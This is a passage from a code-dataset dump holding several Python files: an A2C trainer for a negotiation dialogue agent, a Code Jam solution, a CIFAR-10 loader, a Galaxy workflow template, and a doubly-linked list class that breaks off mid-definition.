default=0.8,\n                        type=float,\n                        help=\"negative cases ratio for downsampling. e.g. 
0.5 means 50% of instances are negative.\")\n\n    parser.add_argument(\"--load_model\",\n                        action='store_true',\n                        default=False,\n                        help=\"Load saved model and resume training from there\")\n\n    parser.add_argument(\"--epochs\",\n                        default=400,\n                        type=int,\n                        help=\"Number of training epochs\")\n\n    parser.add_argument(\"--keras\",\n                        action='store_true',\n                        default=False,\n                        help=\"Use keras model\")\n\n    args = parser.parse_args()\n\n    assert os.path.isdir(args.train_dir)\n    assert os.path.isdir(args.model_destination)\n\n    train_gen = DataGen(build_dataFrame(args.train_dir, threads=3))\n    with open(os.path.join(args.model_destination, 'word_indexes.pkl'), 'wb') as f:\n        pickle.dump(train_gen.word_indexes, f)\n    with open(os.path.join(args.model_destination, 'pos_tags.pkl'), 'wb') as f:\n        pickle.dump(train_gen.pos_tags, f)\n\n    if args.keras: # keras model\n        from src.keras_models import train\n        train(train_gen=train_gen,\n              model_destination=args.model_destination,\n              val_dir=args.val_dir,\n              load_model=args.load_model,\n              epochs=args.epochs)\n    else: # pytorch model\n        from src.torch_models import train\n        train(train_gen=train_gen,\n              model_destination=args.model_destination,\n              val_dir=args.val_dir,\n              load_model=args.load_model,\n              epochs=args.epochs)\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"train_triad.py","file_name":"train_triad.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31298604","text":"import argparse\nimport random\nimport json\nimport numpy as np\nimport copy\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nfrom core.controller import Controller\nfrom .utterance import UtteranceBuilder\n\nfrom tensorboardX import SummaryWriter\n\nfrom neural.rl_trainer import RLTrainer as BaseTrainer\nfrom neural.sl_trainer import Statistics, SimpleLoss\n\nimport math, time, sys\n\n\nclass RLStatistics(Statistics):\n    \"\"\"\n    Accumulator for loss statistics.\n    Currently calculates:\n\n    * accuracy\n    * perplexity\n    * elapsed time\n    \"\"\"\n    def __init__(self, loss=0, reward=0, n_words=0):\n        self.loss = loss\n        self.n_words = n_words\n        self.n_src_words = 0\n        self.reward=reward\n        self.start_time = time.time()\n\n    def update(self, stat):\n        self.loss += stat.loss\n        self.n_words += stat.n_words\n        self.reward += stat.reward\n\n    def mean_loss(self):\n        return self.loss / self.n_words\n\n    def mean_reward(self):\n        return self.reward / self.n_words\n\n    def elapsed_time(self):\n        return time.time() - self.start_time\n\n    def ppl(self):\n        return math.exp(min(self.loss / self.n_words, 100))\n\n    def str_loss(self):\n        return \"loss: %6.4f reward: %6.4f;\" % (self.mean_loss(), self.mean_reward())\n\n    def output(self, epoch, batch, n_batches, start):\n        \"\"\"Write out statistics to stdout.\n\n        Args:\n           epoch (int): current epoch\n           batch (int): current batch\n           n_batches (int): total batches\n           start (int): start time of epoch.\n        \"\"\"\n        t = self.elapsed_time()\n        print((\"Epoch %2d, %5d/%5d;\" + self.str_loss() +\n               \"%6.0f s elapsed\") %\n              (epoch, batch, n_batches,\n               time.time() - start))\n        sys.stdout.flush()\n\nclass SimpleCriticLoss(nn.Module):\n    def __init__(self):\n        super(SimpleCriticLoss, self).__init__()\n        self.criterion = nn.MSELoss()\n\n    # def _get_correct_num(self, enc_policy, tgt_intents):\n    #     enc_policy = enc_policy.argmax(dim=1)\n    #     tmp = (enc_policy == tgt_intents).cpu().numpy()\n    #     tgt = tgt_intents.data.cpu().numpy()\n    #     
tmp[tgt==19] = 1\n # import numpy as np\n # return np.sum(tmp)\n\n def forward(self, pred, oracle, pmask=None):\n loss = self.criterion(pred, oracle)\n stats = self._stats(loss, pred.shape[0])\n return loss, stats\n\n def _stats(self, loss, data_num):\n return RLStatistics(loss=loss.item(), n_words=data_num)\n\nclass RLTrainer(BaseTrainer):\n def __init__(self, agents, scenarios, train_loss, optim, training_agent=0, reward_func='margin',\n cuda=False, args=None):\n super(RLTrainer, self).__init__(agents, scenarios, train_loss, optim,\n training_agent, reward_func, cuda, args)\n # print('training_agent', training_agent)\n self.model_type = args.model_type\n self.use_utterance = False\n\n def _run_batch_a2c(self, batch):\n value = self._run_batch_critic(batch)\n policy, price, pvar = self._run_batch(batch)\n # print('max price', torch.max(price))\n return value, policy, price, pvar\n\n def _gradient_accumulation(self, batch_iter, reward, model, critic, discount=0.95):\n # Compute losses\n model.train()\n critic.train()\n\n values = []\n p_losses = []\n e_losses = []\n penalties = []\n\n # batch_iter gives a dialogue\n policy_stats = Statistics()\n for_value = False\n\n for i, batch in enumerate(batch_iter):\n # print(\"batch: \\nencoder{}\\ndecoder{}\\ntitle{}\\ndesc{}\".format(batch.encoder_inputs.shape, batch.decoder_inputs.shape, batch.title_inputs.shape, batch.desc_inputs.shape))\n # batch.mask_last_price()\n value, policy, price, pvar = self._run_batch_a2c(batch)\n # print('train_policy is:', policy)\n if not batch.for_value:\n policy_loss, pl_stats = self._compute_loss(batch, policy=policy, price=(price, pvar), loss=self.train_loss)\n # print('policy_loss is:', policy_loss)\n policy_stats.update(pl_stats)\n\n entropy_loss, _ = self._compute_loss(batch, policy=policy, price=(price, pvar), loss=self.entropy_loss)\n\n # penalty = ((price-1)**2).mul((price>2).float()) + ((price-0)**2).mul((price<0.5).float())\n # penalty = ((price > 2).float()).mul((price - 1) ** 2) + ((price < 0.5).float()).mul((price - 0) ** 2)\n penalty = ((price > 2).float()).mul(0.1) + ((price < 0.5).float()).mul(0.1)\n penalty = torch.zeros_like(price, device=price.device)\n\n\n\n if not batch.for_value:\n penalties.append(penalty.view(-1))\n p_losses.append(policy_loss.view(-1))\n e_losses.append(entropy_loss.view(-1))\n values.append(value.view(-1))\n\n for_value = batch.for_value\n\n # print('allnll ', nll)\n rewards = [0] * len(values)\n rewards[-1] = torch.ones(1) * reward\n\n old_rewards = [0] * len(values)\n old_rewards[-1] = torch.ones(1) * reward\n for i in range(len(rewards) - 2, -1, -1):\n rewards[i] = torch.ones(1) * rewards[i]\n old_rewards[i] = old_rewards[i + 1] * discount\n\n for i in range(len(rewards) - 2, -1, -1):\n rewards[i] += (values[i + 1].cpu().item()) * discount\n\n # print(old_rewards)\n\n new_rewards = torch.cat(rewards)\n new_values = torch.cat(values)\n if for_value:\n old_rewards = torch.cat(old_rewards[:-1])\n rewards = torch.cat(rewards[:-1])\n values = torch.cat(values[:-1]) # (total_seq_len, batch_size)\n else:\n old_rewards = torch.cat(old_rewards)\n rewards = torch.cat(rewards)\n values = torch.cat(values) # (total_seq_len, batch_size)\n\n if self.cuda:\n new_rewards = new_rewards.cuda()\n new_values = new_values.cuda()\n old_rewards = old_rewards.cuda()\n rewards = rewards.cuda()\n values = values.cuda()\n\n\n value_loss, vl_stats = self._compute_loss(None, value=new_values, oracle=new_rewards, loss=self.critic_loss)\n # print('values', values, p_losses)\n old_p_losses = 
torch.cat(p_losses).view(rewards.shape)\n # p_losses = old_p_losses.mul(old_rewards).mean()\n # print('shapes', old_p_losses, old_rewards)\n # p_losses = old_p_losses.mul(old_rewards).mean()\n if self.model_type == 'reinforce':\n p_losses = old_p_losses.mul(old_rewards)\n else:\n p_losses = old_p_losses.mul(rewards - values.detach())\n e_losses = torch.cat(e_losses)\n regular = torch.cat(penalties)\n return p_losses, e_losses, value_loss, regular, (old_p_losses, policy_stats)\n\n def update_a2c(self, args, batch_iters, rewards, model, critic, discount=0.95, fix_policy=False, fix_value=False):\n p_losses, e_losses, value_loss, regular = None, None, None, None\n old_p_losses = None\n policy_stats = Statistics()\n for i, bi in enumerate(batch_iters):\n p,e,v,r, info = self._gradient_accumulation(bi, rewards[i], model, critic, discount)\n if p_losses is None:\n p_losses, e_losses, value_loss, regular = p,e,v,r\n old_p_losses = info[0]\n else:\n p_losses = torch.cat([p_losses, p], dim=-1)\n e_losses = torch.cat([e_losses, e], dim=-1)\n value_loss = torch.cat([value_loss, v], dim=-1)\n regular = torch.cat([regular, r], dim=-1)\n old_p_losses = torch.cat([old_p_losses, info[0]], dim=-1)\n policy_stats.update(info[1])\n\n # Update step\n p_losses = p_losses.mean()\n e_losses = e_losses.mean()\n value_loss = value_loss.mean()\n regular = regular.mean()\n\n # final_loss = p_losses - self.ent_coef * e_losses + self.val_coef * value_loss + self.p_reg_coef * regular\n # final_loss = p_losses + self.val_coef * value_loss\n final_loss = p_losses - self.ent_coef * e_losses + self.val_coef * value_loss + self.p_reg_coef * regular\n model_loss = p_losses - self.ent_coef * e_losses + self.p_reg_coef * regular\n critic_loss = self.val_coef * value_loss\n\n # print('all loss', final_loss, p_losses, e_losses, value_loss)\n assert not torch.isnan(final_loss)\n # final_loss.backward()\n # model_loss.backward()\n # critic_loss.backward()\n # nn.utils.clip_grad_norm(critic.parameters(), 1.)\n # nn.utils.clip_grad_norm(model.parameters(), 1.)\n # self.optim.step()\n\n # if not self.model_type == \"reinforce\":\n if not args.only_run:\n if not fix_value:\n critic.zero_grad()\n critic_loss.backward()\n nn.utils.clip_grad_norm_(critic.parameters(), 1.)\n self.optim['critic'].step()\n\n if not fix_policy:\n model.zero_grad()\n model_loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 1.)\n self.optim['model'].step()\n\n return torch.cat([final_loss.view(-1), p_losses.view(-1), e_losses.view(-1),\n value_loss.view(-1),\n torch.ones(1, device=final_loss.device) * policy_stats.mean_loss(0),\n torch.ones(1, device=final_loss.device) * policy_stats.mean_loss(1),\n old_p_losses.mean().view(-1) ],).view(1,-1).cpu().data.numpy()\n\n def validate(self, args, valid_size, valid_critic=False, start=0, split='dev', exchange=None):\n rate = 0.5\n if exchange is not None:\n if exchange:\n rate = 1\n else:\n rate = 0\n self.model.eval()\n self.critic.eval()\n total_stats = RLStatistics()\n oppo_total_stats = RLStatistics()\n valid_size = min(valid_size, 200)\n # print('='*20, 'VALIDATION', '='*20)\n examples = []\n verbose_str = []\n for sid, scenario in enumerate(self.scenarios[split][start:start+valid_size]):\n controller = self._get_controller(scenario, split=split, rate=rate)\n controller.sessions[0].set_controller(controller)\n controller.sessions[1].set_controller(controller)\n example = controller.simulate(args.max_turns, verbose=args.verbose)\n session = controller.sessions[self.training_agent]\n reward = 
self.get_reward(example, session)\n rewards = [self.get_reward(example, controller.sessions[i]) for i in range(2)]\n stats = RLStatistics(reward=rewards[0], n_words=1)\n oppo_stats = RLStatistics(reward=rewards[1], n_words=1)\n total_stats.update(stats)\n oppo_total_stats.update(oppo_stats)\n examples.append(example)\n verbose_str.append(self.example_to_str(example, controller, rewards, sid+start))\n # print('='*20, 'END VALIDATION', '='*20)\n self.model.train()\n self.critic.train()\n return [total_stats, oppo_total_stats], examples, verbose_str\n\n def save_best_checkpoint(self, checkpoint, opt, valid_stats):\n\n path = None\n if opt.model_type == 'reinforce' or opt.model_type == 'a2c':\n if self.best_valid_reward is None or valid_stats.mean_reward() > self.best_valid_reward:\n self.best_valid_reward = valid_stats.mean_reward()\n path = '{root}/{model}_best.pt'.format(\n root=opt.model_path,\n model=opt.model_filename)\n elif opt.model_type == 'critic':\n if self.best_valid_loss is None or valid_stats.mean_loss() < self.best_valid_loss:\n self.best_valid_loss = valid_stats.mean_loss()\n path = '{root}/{model}_best.pt'.format(\n root=opt.model_path,\n model=opt.model_filename)\n\n if path is not None:\n print('Save best checkpoint {path}'.format(path=path))\n torch.save(checkpoint, path)\n\n def checkpoint_path(self, episode, opt, stats):\n path=None\n if opt.model_type == 'reinforce' or opt.model_type == 'a2c' or opt.model_type == 'tom':\n path = '{root}/{model}_reward{reward:.2f}_e{episode:d}.pt'.format(\n root=opt.model_path,\n model=opt.model_filename,\n reward=stats.mean_reward(),\n episode=episode)\n elif opt.model_type == 'critic':\n path = '{root}/{model}_loss{reward:.4f}_e{episode:d}.pt'.format(\n root=opt.model_path,\n model=opt.model_filename,\n reward=stats.mean_loss(),\n episode=episode)\n assert path is not None\n return path\n\n def update_opponent(self, type=None):\n if type is None:\n types = ['policy', 'critic']\n elif not isinstance(type, list):\n types = [type]\n else:\n types = type\n\n print('update opponent model for {}.'.format(types))\n if 'policy' in types:\n tmp_model_dict = self.agents[self.training_agent].env.model.state_dict()\n self.agents[self.training_agent^1].env.model.load_state_dict(tmp_model_dict)\n if 'critic' in types:\n tmp_model_dict = self.agents[self.training_agent].env.critic.state_dict()\n self.agents[self.training_agent^1].env.critic.load_state_dict(tmp_model_dict)\n\n def get_temperature(self, epoch, batch_size, args):\n if args.only_run or args.warmup_epochs == 0:\n return 1\n half = args.num_dialogues // batch_size / 2\n t_s, t_e = 0.3, 1\n i_s, i_e = 0, half\n return min(t_e, t_s + (t_e - t_s) * 1. 
* epoch / args.warmup_epochs)\n # return min(1., 1.*epoch/half)\n \n def example_to_text(self, exmaple):\n ret = []\n for i, e in enumerate(exmaple.events):\n if \"real_uttr\" in e.metadata.keys():\n ret.append(\"[{}: {}]\\t{}\\t{}\\t\\\"{}\\\"\".format(e.time, e.agent, e.action, e.data, e.metadata[\"real_uttr\"]))\n else:\n ret.append(\"[{}: {}]\\t{}\\t{}\".format(e.time, e.agent, e.action, e.data))\n return ret \n \n\n def example_to_str(self, example, controller, rewards, sid=None):\n verbose_str = []\n from core.price_tracker import PriceScaler\n if sid is not None:\n verbose_str.append('[Scenario id: {}]'.format(sid))\n for session_id, session in enumerate(controller.sessions):\n bottom, top = PriceScaler.get_price_range(session.kb)\n s = 'Agent[{}: {}], bottom ${}, top ${}'.format(session_id, session.kb.role, bottom, top)\n verbose_str.append(s)\n verbose_str.append(\"They are negotiating for \"+session.kb.facts['item']['Category'])\n\n strs = self.example_to_text(example)\n for str in strs:\n verbose_str.append(str)\n s = \"reward: [0]{}\\nreward: [1]{}\".format(rewards[0], rewards[1])\n verbose_str.append(s)\n return verbose_str\n\n def sample_data(self, i, batch_size, args, real_batch=None):\n if real_batch is None:\n real_batch = batch_size\n rewards = [0]*2\n s_rewards = [0]*2\n _batch_iters = []\n _rewards = [[], []]\n examples = []\n verbose_strs = []\n for j in range(real_batch):\n # Rollout\n scenario, sid = self._get_scenario()\n controller = self._get_controller(scenario, split='train')\n controller.sessions[0].set_controller(controller)\n controller.sessions[1].set_controller(controller)\n example = controller.simulate(args.max_turns, verbose=args.verbose, temperature=self.get_temperature(i, batch_size, args))\n\n for session_id, session in enumerate(controller.sessions):\n # if args.only_run != True and session_id != self.training_agent:\n # continue\n # Compute reward\n reward = self.get_reward(example, session)\n # Standardize the reward\n all_rewards = self.all_rewards[session_id]\n all_rewards.append(reward)\n s_reward = (reward - np.mean(all_rewards)) / max(1e-4, np.std(all_rewards))\n\n rewards[session_id] = reward\n s_rewards[session_id] = s_reward\n _rewards[session_id].append(reward)\n\n for session_id, session in enumerate(controller.sessions):\n # Only train one agent\n if session_id != self.training_agent:\n continue\n\n batch_iter = session.iter_batches()\n T = next(batch_iter)\n _batch_iters.append(list(batch_iter))\n\n\n # if train_policy or args.model_type == 'tom':\n\n examples.append(example)\n verbose_str = self.example_to_str(example, controller, rewards, sid)\n\n if args.verbose:\n for s in verbose_str:\n print(s)\n verbose_strs.append(verbose_str)\n\n return _batch_iters, _rewards, examples, verbose_strs\n\n def learn(self, args):\n rewards = [None]*2\n s_rewards = [None]*2\n\n critic_report_stats = RLStatistics()\n critic_stats = RLStatistics()\n last_time = time.time()\n\n tensorboard_every = 1\n save_every = 100\n\n history_train_losses = [[],[]]\n\n batch_size = 100\n\n pretrain_rounds = 3\n if args.only_run:\n batch_size = 1\n pretrain_rounds = 0\n\n save_every = max(1, save_every // batch_size)\n report_every = max(1, args.report_every // batch_size)\n\n for i in range(args.num_dialogues // batch_size):\n _batch_iters, _rewards, example, train_ex_str = self.sample_data(i, batch_size, args)\n # print('reward is:', _rewards)\n # print(np.mean(_rewards[0]), np.mean(_rewards[1]))\n # 
print(np.mean(self.all_rewards[0][-tensorboard_every*batch_size:]), np.mean(self.all_rewards[1][-tensorboard_every*batch_size:]))\n\n path_txt = '{root}/{model}_example{epoch}.txt'.format(\n root=args.model_path,\n model=args.name,\n epoch=i)\n with open(path_txt, 'w') as f:\n for ex in train_ex_str:\n f.write('-' * 7 + '\\n')\n for s in ex:\n f.write(s + '\\n')\n\n # if train_policy:\n # self.update(batch_iter, reward, self.model, discount=args.discount_factor)\n #\n # if train_critic:\n # stats = self.update_critic(batch_iter, reward, self.critic, discount=args.discount_factor)\n # critic_report_stats.update(stats)\n # critic_stats.update(stats)\n k = -1\n for k in range(pretrain_rounds):\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor, fix_policy=True)\n # if (k+1)%5 == 0:\n # _batch_iters, _rewards, example, _ = self.sample_data(i, batch_size, args)\n # if loss[0,3].item() < 0.2:\n # break\n if k >=0:\n print('Pretrained value function for {} rounds, and the final loss is {}.'.format(k+1, loss[0,3].item()))\n # if loss[0, 3].item() >= 0.3:\n # print('Try to initialize critic parameters.')\n # for p in self.critic.parameters():\n # p.data.uniform_(-args.param_init, args.param_init)\n # for k in range(20):\n # loss = self.update_a2c(args, _batch_iters, _rewards, self.model, self.critic,\n # discount=args.discount_factor, fix_policy=True)\n # if (k + 1) % 5 == 0:\n # _batch_iters, _rewards, controller, example = self.sample_data(i, batch_size, args)\n # if loss[0, 3].item() < 0.2:\n # break\n # print('Pretrained value function for {} rounds, and the final loss is {}.'.format(k + 1,\n # loss[0, 3].item()))\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor)\n for k in range(pretrain_rounds):\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor, fix_policy=True)\n history_train_losses[self.training_agent].append(loss)\n\n # print('verbose: ', args.verbose)\n\n # print(\"Standard reward: [0]{} [1]{}\".format(s_rewards[0], s_rewards[1]))\n\n # Save logs on tensorboard\n if (i + 1) % tensorboard_every == 0:\n ii = (i+1)*batch_size\n for j in range(2):\n self.writer.add_scalar('agent{}/reward'.format(j), np.mean(self.all_rewards[j][-tensorboard_every*batch_size:]), ii)\n if len(history_train_losses[j]) >= tensorboard_every*batch_size:\n tmp = np.concatenate(history_train_losses[j][-tensorboard_every*batch_size:], axis=0)\n tmp = np.mean(tmp, axis=0)\n self.writer.add_scalar('agent{}/total_loss'.format(j), tmp[0], ii)\n self.writer.add_scalar('agent{}/policy_loss'.format(j), tmp[1], ii)\n self.writer.add_scalar('agent{}/entropy_loss'.format(j), tmp[2], ii)\n self.writer.add_scalar('agent{}/value_loss'.format(j), tmp[3], ii)\n self.writer.add_scalar('agent{}/intent_loss'.format(j), tmp[4], ii)\n self.writer.add_scalar('agent{}/price_loss'.format(j), tmp[5], ii)\n self.writer.add_scalar('agent{}/logp_loss'.format(j), tmp[6], ii)\n\n\n if ((i + 1) % report_every) == 0:\n import seaborn as sns\n import matplotlib.pyplot as plt\n if args.histogram:\n sns.set_style('darkgrid')\n\n # if train_policy:\n for j in range(2):\n print('agent={}'.format(j), end=' ')\n print('step:', i, end=' ')\n print('reward:', rewards[j], end=' ')\n print('scaled reward:', s_rewards[j], end=' ')\n print('mean reward:', np.mean(self.all_rewards[j][-args.report_every:]))\n if 
args.histogram:\n self.agents[j].env.dialogue_generator.get_policyHistogram()\n\n # if train_critic:\n # critic_report_stats.output(i+1, 0, 0, last_time)\n # critic_report_stats = RLStatistics()\n\n print('-'*10)\n if args.histogram:\n plt.show()\n\n last_time = time.time()\n\n # Save model\n if (i+1) % save_every == 0:\n # TODO: valid in dev set\n valid_stats, _, _ = self.validate(args, 50 if args.only_run else 200)\n valid_stats = valid_stats[0]\n if not args.only_run:\n self.drop_checkpoint(args, i+1, valid_stats, model_opt=self.agents[self.training_agent].env.model_args)\n if args.update_oppo:\n print('update oppo!')\n self.update_opponent(['policy', 'critic'])\n else:\n print('valid ', valid_stats.str_loss())\n\n # if train_policy:\n # valid_stats, _ = self.validate(args)\n # self.drop_checkpoint(args, i, valid_stats, model_opt=self.agents[self.training_agent].env.model_args)\n # self.update_opponent('policy')\n #\n # elif train_critic:\n # # TODO: reverse!\n # self.drop_checkpoint(args, i, critic_stats, model_opt=self.agents[self.training_agent].env.model_args)\n # critic_stats = RLStatistics()\n # else:\n # valid_stats, _ = self.validate(args)\n # print('valid result: ', valid_stats.str_loss())","sub_path":"craigslistbargain/neural/a2c_trainer.py","file_name":"a2c_trainer.py","file_ext":"py","file_size_in_byte":24978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"98034330","text":"import io\nimport sys\nimport collections\n\n# 2017 io for women https://code.google.com/codejam/contest/12224486/dashboard#s=p0&a=2\n# Simulate the redirect stdin.\nif len(sys.argv) > 1:\n filename = sys.argv[1]\n inp = ''.join(open(filename, \"r\").readlines())\n sys.stdin = io.StringIO(inp)\n\ndef guess(F,S, tickets):\n count = 0\n for i in range(1,S+1):\n h = {}\n for t in tickets:\n if t[0] == i:\n if t not in h:\n h[t] = True\n elif t[1] == i:\n if (t[1],t[0]) not in h:\n h[(t[1],t[0])] = True\n\n #print(h)\n count = max(count, len(h))\n return count\n\ndef main():\n t = int(input()) # read a line with a single integer\n for i in range(1, t + 1):\n [F,S] = [int(s) for s in input().split(\" \")]\n tickets=[]\n for j in range(F):\n [r,c] = [int(s) for s in input().split(\" \")]\n tickets.append( (r,c))\n \n #print(tickets)\n ans = guess(F,S, tickets)\n \n print(\"Case #{}: {}\".format(i, ans))\n \n\n\nif __name__ == \"__main__\":\n main()","sub_path":"jam/ticket_trouble.py","file_name":"ticket_trouble.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"539025907","text":"import matplotlib\r\n# For Mac OS\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass dataInput:\r\n \r\n def __init__(self):\r\n self.trainData, self.testData = self.dataLoad()\r\n self.labelName = ['airplane',\r\n 'automobile',\r\n 'bird',\r\n 'cat',\r\n 'deer',\r\n 'dog',\r\n 'frog',\r\n 'horse',\r\n 'ship',\r\n 'truck']\r\n \r\n def dataLoad(self):\r\n \r\n data = []\r\n for i in range(5):\r\n dataFrame = self.unpickle('./data_set/cifar_10/data_batch_' + str(i+1))\r\n data.append(dataFrame)\r\n testData = self.unpickle('./data_set/cifar_10/test_batch' )\r\n \r\n return data, testData\r\n \r\n def unpickle(self,file):\r\n import pickle\r\n with open(file, 'rb') as fo:\r\n dict = pickle.load(fo, encoding='bytes')\r\n return dict \r\n \r\n def dataVisuallization(self, label):\r\n \r\n tmpDataIdx = [idx for idx, val in 
enumerate(self.testData[b'labels']) if val ==label]\r\n tmpData = self.testData[b'data'][tmpDataIdx[np.random.choice(len(tmpDataIdx))],:].reshape([3,32,32])\r\n plt.imshow(tmpData.transpose(1,2,0)) \r\n return tmpData\r\n\r\n def dataVisuallizationSubplot(self):\r\n for i in range(10):\r\n for q in range(10):\r\n plt.subplot(10,10,((i)*10) + (q+1) )\r\n self.dataVisuallization(q)\r\n if(i==0):\r\n plt.title(self.labelName[q])\r\n plt.show()\r\n \r\n\r\nif __name__ == '__main__':\r\n dataOb = dataInput()","sub_path":"dataInput.py","file_name":"dataInput.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247112919","text":"##### HACKS ###\n#\n# - Package installs - Cheetah, bx-python\n# - Fake inputs\n# - Metadata\n# - Environment variables - TOOL_PATH, GALAXY_DATA_INDEX_DIR\n# - Patching sam_to_bam.py to avoid \"import galaxy\"\n#\n###############\n\n# @PACKAGE name:\"Cheetah\"\n# @PACKAGE name:\"bx-python\"\n\n# CONTAINER name:\"vernonm_galaxy_env_2\", dir_mapping:\"/nfs/data:/data\"\nfrom appsoma_galaxy import *\nfrom appsoma_api import *\nfrom pprint import pprint\n\nimport os, subprocess\n\nresource_pull('https://' + appsoma_api.environment_get_my_web_address()+\"/programs/$FULL_NAME\",\"workflow.ga\")\n\nTOOL_PATH = \"/galaxy/tools\"\nGALAXY_DATA_INDEX_DIR = \"/galaxy/tool-data\"\n\nif os.environ['MY_IP'].split('.')[0] != \"node-1\" and os.environ['MY_IP'].split('.')[0] != \"staging-node-1\":\n\timport vernonm_nygc_waldorf_only_paths\n\tpaths = vernonm_nygc_waldorf_only_paths.get_environment_paths()\n\n\tTOOL_PATH = paths['TOOL_PATH']\n\tGALAXY_DATA_INDEX_DIR = paths['GALAXY_DATA_INDEX_DIR']\n\nUSER_INPUTS = {\n\"1\":\n\t{\n\t\t\"ref_file\":{\"metadata\": {\"dbkey\": \"mm9\"}},\n\t\t\"GALAXY_DATA_INDEX_DIR\": GALAXY_DATA_INDEX_DIR\n\t}\n}\n\nMETADATA = {\n\"0\":\n\t{\n\t\t\"singlePaired.sInput1.ext\": \"fastqsanger\",\n\t\t\"refGenomeSource.ownFile.extension\": \"fasta\"\n\t}\n}\n\n\nSTYLES = \"\"\"\n\n\"\"\"\n\n\nwith open(\"workflow.ga\") as json_file:\n\tj = json.load(json_file)\n\tif 'code' in j:\n\t\tj = json.loads(j['code'])\n\t# Works on the workflow file and derives step information\n\td = compute_dependency_tree(j[\"steps\"])\n\td = sorted(d, key = lambda x: x[\"id\"])\n\t# Converts the tool xml to jsonforms\n\tp = process_galaxy_workflow(d, TOOL_PATH, USER_INPUTS, METADATA, STYLES)\n\t# See appsoma_api.py - This renders a html form from the json\n\t# definition and displays it in the run console\n\t#p = create_pipeline(d, TOOL_PATH, USER_INPUTS, METADATA)\n\tp.run()\n","sub_path":"programs/appsoma_galaxy_template.py","file_name":"appsoma_galaxy_template.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605707524","text":"\"\"\" List (Doubly-Linked list) \"\"\"\n\nclass List:\n \"\"\"\n Doubly-Linked List implementation\n\n Attributes\n ----------\n head: Node\n Head Node\n\n tail: Node\n Tail Node\n\n size: int\n Number of elements in the list.\n\n Methods\n -------\n get_length()\n is_empty()\n insert(element)\n insert_back(element)\n insert_front(element)\n remove(element)\n remove_first()\n remove_last()\n search(element)\n contains(element)\n reverse()\n clear()\n get_first()\n get_last()\n get(index)\n index(element)\n copy()\n \"\"\"\n class Node:\n \"\"\"\n Node that contains the element.\n\n Attributes\n ----------\n element: element\n The key value the node holds.\n 
previous: Node\n A reference to the previous node in the list.\n next: Node\n A reference to the next node in the list.\n\n \"\"\"\n def __init__(self, element):\n \"\"\"\n Node constructor.\n\n Parameters\n ----------\n element: element\n The node element. \n \"\"\"\n self.element = element\n self.previous = None\n self.next = None\n\n def __init__(self):\n \"\"\"\n List constructor.\n \"\"\"\n self.head = None\n self.tail = None\n self.size = 0\n\n def __str__(self):\n \"\"\"\n Returns the string representation of the list.\n\n Traverses all the nodes, concatenating in each step the string\n representation of the element contained in the node.\n :return: The string representation.\n :rtype: string\n \"\"\"\n current_node = self.head\n list_string = \"[\"\n while current_node != None:\n list_string += str(current_node.element)\n current_node = current_node.next\n if current_node != None:\n list_string += \", \"\n list_string += \"]\"\n return list_string\n\n def __repr__(self):\n \"\"\"\n Returns the string representation of the list.\n\n :return: The string representation.\n :rtype: string\n \"\"\"\n return str(self)\n\n def get_length(self):\n \"\"\"\n Returns the number of elements in the list.\n\n :return: The size of the list.\n :rtype: int\n \"\"\"\n return self.size\n\n def is_empty(self):\n \"\"\"\n Checks whether or not the list has no elements.\n\n :return: True is it has no element; false otherwise.\n :rtype: boolean\n \"\"\"\n return self.head == None\n\n def insert(self, element):\n \"\"\"\n Inserts a new node in the list, with the element specified as parameter.\n\n :param element: The element to be inserted in the list.\n \"\"\"\n if element == None:\n return\n new_node = self.Node(element)\n if self.is_empty():\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n new_node.previous = self.tail\n self.tail = new_node\n self.size += 1\n\n def insert_back(self, element):\n \"\"\"\n Inserts the given element at the back of the list.\n\n :param element: The element to be inserted.\n \"\"\"\n self.insert(element)\n\n def insert_front(self, element):\n \"\"\"\n Inserts the given element at the front of the list.\n\n :param element: The element to be inserted.\n \"\"\"\n if element == None:\n return\n new_node = self.Node(element)\n if self.is_empty():\n self.head = new_node\n self.tail = new_node\n else:\n self.head.previous = new_node\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n\n def remove(self, element):\n \"\"\"\n Deletes an element from the list. Decrements the size of the list after the operation.\n\n :param element: The element which we wish to remove.\n \"\"\"\n removed_node = self.search(element)\n if removed_node == None:\n return\n if self.head == self.tail:\n self.head = None\n self.tail = None\n elif self.head == removed_node:\n self.head = self.head.next\n self.head.previous = None\n elif self.tail == removed_node:\n self.tail = self.tail.previous\n self.tail.next = None\n else:\n removed_node.previous.next = removed_node.next\n removed_node.next.previous = removed_node.previous\n self.size -= 1\n\n def remove_first(self):\n \"\"\"\n Deletes the element that is held at the head of the list. 
Decrements the size of the list\n        after the operation.\n\n        :return: The removed element.\n        :rtype: element\n        \"\"\"\n        if self.is_empty():\n            return\n        removed_element = self.head.element\n        self.head = self.head.next\n        if self.size == 1:\n            self.tail = None\n        else:\n            self.head.previous = None\n        self.size -= 1\n        return removed_element\n\n    def remove_last(self):\n        \"\"\"\n        Deletes the element that is held at the tail of the list. Decrements the size of the list\n        after the operation.\n\n        :return: The removed element.\n        :rtype: element\n        \"\"\"\n\n        if self.is_empty():\n            return\n        removed_element = self.tail.element\n        self.tail = self.tail.previous\n        if self.size == 1:\n            self.head = None\n        else:\n            self.tail.next = None\n        self.size -= 1\n        return removed_element\n\n    def search(self, element):\n        \"\"\"\n        Traverses 